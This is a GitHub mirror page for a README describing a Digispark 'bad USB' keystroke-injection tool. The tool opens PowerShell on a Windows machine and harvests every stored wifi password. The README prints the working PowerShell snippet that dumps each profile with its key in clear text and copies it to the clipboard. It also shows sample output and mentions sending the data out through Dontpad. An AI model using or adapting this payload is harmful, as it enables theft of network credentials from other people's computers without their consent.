GithubHelp home page GithubHelp logo

dragosradut / wifi-profile-grabber Goto Github PK

View Code? Open in Web Editor NEW
2.0 1.0 1.0 12 KB

Wifi Profile Grabber - Rubber Ducky

License: MIT License

C++ 100.00%
digispark-payload netsh-wlan rubber-ducky wifi-credentials

wifi-profile-grabber's Introduction

Wifi Profile Grabber

Description

This is a simple keystroke injection script designed for grabbing user's wifi credentials.

Specifications

  • Hardware = Digispark ATTINY85
  • Platform = Windows (PowerShell)
  • Implementation = Arduino script

Implementation

Script uses standard delay and keystoke commands. Inserting the bad usb will open PowerShell window. Credentials are obtained using the following simplified script:

$a = (netsh wlan show profiles) | Select-String ' :(.*)' // store all found profiles
$count = 1
$out = while($a.matches.groups[$count].value) { netsh wlan show profiles $a.matches.groups[$count].value.Trim() key=clear; $count+=2}
write-output $out | clip // copy to clipboard

Can be replaced with Hak5's one-liner.

Output

Script will grab data of all stored wifi credentials from attacked machine. The following example showcases one profile:

Profile K. on interface Wi-Fi: 
======================================================================= 

Applied: All User Profile    

Profile information 
------------------- 
    Version                : 1
    Type                   : Wireless LAN
    Name                   : K.
    Control options        : 
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
        AutoSwitch         : Do not switch to other networks
        MAC Randomization  : Disabled

Connectivity settings 
--------------------- 
    Number of SSIDs        : 1
    SSID name              : "K."
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]
    Vendor extension          : Not present

Security settings 
----------------- 
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Authentication         : WPA2-Personal
    Cipher                 : GCMP
    Security key           : Present
    Key Content            : <PASSWORD>

Cost settings 
------------- 
    Cost                   : Fixed
    Congested              : No
    Approaching Data Limit : No
    Over Data Limit        : No
    Roaming                : No
    Cost Source            : Operator

Limitations

  • Exfiltrating data: implementation recovers data from attacked machine using Dontpad (assuming internet connection).
  • Delay: differences between tested machines showed that applied delay between keystrokes may be too low resulting in skipping script steps.
  • Demonstration purposes only: commands executed are visible on attacked machine.

wifi-profile-grabber's People

Contributors

dragosradut avatar

Stargazers

avatar avatar

Watchers

avatar

Forkers

ialansaydon

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.